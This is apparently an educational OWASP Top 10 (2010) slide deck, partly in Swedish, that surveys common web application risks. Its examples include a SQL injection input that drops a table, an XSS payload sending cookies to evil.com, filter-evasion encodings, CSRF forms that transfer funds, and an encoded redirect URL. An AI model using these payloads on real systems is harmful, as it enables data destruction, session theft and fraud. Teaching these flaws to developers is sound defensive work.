owasp owasp top 10 - agenda background risk based top 10 items 1 – 6 live demo top 10 items 7...
TRANSCRIPT
![Page 1: OWASP OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649f1e5503460f94c360d6/html5/thumbnails/1.jpg)
OWASP
OWASP top 10 - Agenda
Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources
![Page 2: OWASP OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649f1e5503460f94c360d6/html5/thumbnails/2.jpg)
OWASP
The OWASP Guide
![Page 3: OWASP OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649f1e5503460f94c360d6/html5/thumbnails/3.jpg)
OWASP
ThreatAgent
AttackVector
Weakness Prevalence
Weakness Detectability
Technical Impact
Business Impact
?Easy Widespread Easy Severe
?Average Common Average Moderate
Difficult Uncommon Difficult Minor
![Page 4: OWASP OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649f1e5503460f94c360d6/html5/thumbnails/4.jpg)
OWASP
Warning
Risk analysis Insiders
Architecture Modular Clarity
SDLC Knowledge Predictability
![Page 5: OWASP OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649f1e5503460f94c360d6/html5/thumbnails/5.jpg)
OWASP
Top 10 - 2010
1. Injection 2. Cross site scripting (XSS) 3. Broken authentication and session
management 4. Insecure direct object reference 5. Cross site request forgery (CSRF) 6. Security missconfiguration 7. Insecure cryptograpic storage 8. Failure to restrict URL access 9. Insufficient transoport layer protection 10.Unvalidated redirects and forwards
![Page 6: OWASP OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649f1e5503460f94c360d6/html5/thumbnails/6.jpg)
OWASP
A1 – Injection
Client ApplDB
Shell
Pgm CPU
![Page 7: OWASP OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649f1e5503460f94c360d6/html5/thumbnails/7.jpg)
OWASP
A1 – Injection
String query = "SELECT * FROM accnts WHERE ID='" + request.getParameter("id") +"'";
id="foo';DROP accnts;--"
SELECT * FROM accnts WHERE ID='foo';DROP accnts;--';
id="foo"
SELECT * FROM accnts WHERE ID='foo';
![Page 8: OWASP OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649f1e5503460f94c360d6/html5/thumbnails/8.jpg)
OWASP
A2 - Cross site scripting (XSS)
Browser
Browser
Appl DB
![Page 9: OWASP OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649f1e5503460f94c360d6/html5/thumbnails/9.jpg)
OWASP
A2 - Cross site scripting (XSS)
(String) page += "<input name='cc' type='TEXT' value='" + request.getParameter("CC") + "'>";
CC=123456789"><script>window.location=http://evil.com?x=document.cookie</script>
<input name='cc' value='123456789“><script> window.location=http://evil.com?x=document.cookie </script>'>
CC=“123456789"
<input name='cc' value='123456789'>
![Page 10: OWASP OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649f1e5503460f94c360d6/html5/thumbnails/10.jpg)
OWASP
A2 - Cross site scripting (XSS)
<<�\x3c\x3C\u003c\u003C
<%3C<<<<<<<
<img src=http://site.com onmoseover= <body onload= <IMG SRC=jAvascript:alert('test2')>
![Page 11: OWASP OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649f1e5503460f94c360d6/html5/thumbnails/11.jpg)
OWASP
A3 - Broken authentication and session mngmnt
Unpredictable passwords, sessions-ID, security-questions
No sessions-id/credentials i URL Avoid session-fixation Time out of sessions & logout buttons Different sessions id outside/inside TLS No clear text passwords
![Page 12: OWASP OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649f1e5503460f94c360d6/html5/thumbnails/12.jpg)
OWASP
A4 - Insecure direct object references
<SELECT name=period> <OPTION>2010q1</OPTION> <OPTION>2011q2</OPTION></SELECT>
period=2011q3
period=2011q2
![Page 13: OWASP OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649f1e5503460f94c360d6/html5/thumbnails/13.jpg)
OWASP
A5 - Cross-site request forgery (CSRF)
<img src="http://example.com/transferFunds?amount=1500 &destinationAccount=attackersAcct#“width="0" height="0" />
<body onload="document.forms[0].submit()"> <form method="POST" action="https://bank.com/fn"> <input type="hidden" name="sp" value="8109"/> </form>
![Page 14: OWASP OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649f1e5503460f94c360d6/html5/thumbnails/14.jpg)
OWASP
A6 - Security missconfiguration
Patching OS Application Frameworks / libraries
Disable unnecessary services Stack traces Configuration
![Page 15: OWASP OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649f1e5503460f94c360d6/html5/thumbnails/15.jpg)
OWASP
A7 - Insecure cryptographig storage
Keep track on sensitive data Password one-way-hashed & salted Password/Key management
TLS key pass phrase M2M lösenord (obfuscation)
![Page 16: OWASP OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649f1e5503460f94c360d6/html5/thumbnails/16.jpg)
OWASP
A8 - Failure to restrict URL access
/user/getAccounts/admin/getAccounts
![Page 17: OWASP OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649f1e5503460f94c360d6/html5/thumbnails/17.jpg)
OWASP
A9 - Insufficient transport layer protection
Use SSL/TLS No mixed content Use secure cookies
Example FireSheep exploits poor solutions
![Page 18: OWASP OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649f1e5503460f94c360d6/html5/thumbnails/18.jpg)
OWASP
A10 - Unvalidated redirects and forwards
http://www.vuln.com/redir.asp?=http://www.links.com
http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D
![Page 19: OWASP OWASP top 10 - Agenda Background Risk based Top 10 items 1 – 6 Live demo Top 10 items 7 – 10 OWASP resources](https://reader035.vdocuments.us/reader035/viewer/2022081519/56649f1e5503460f94c360d6/html5/thumbnails/19.jpg)
OWASP
OWASP resurser
OWASP Secure Software Contract Annex OWASP Developer’s Guide OWASP Enterprise Security API (ESAPI) OWASP Software Assurance Maturity Mode
l (SAMM)
OWASP WebGoat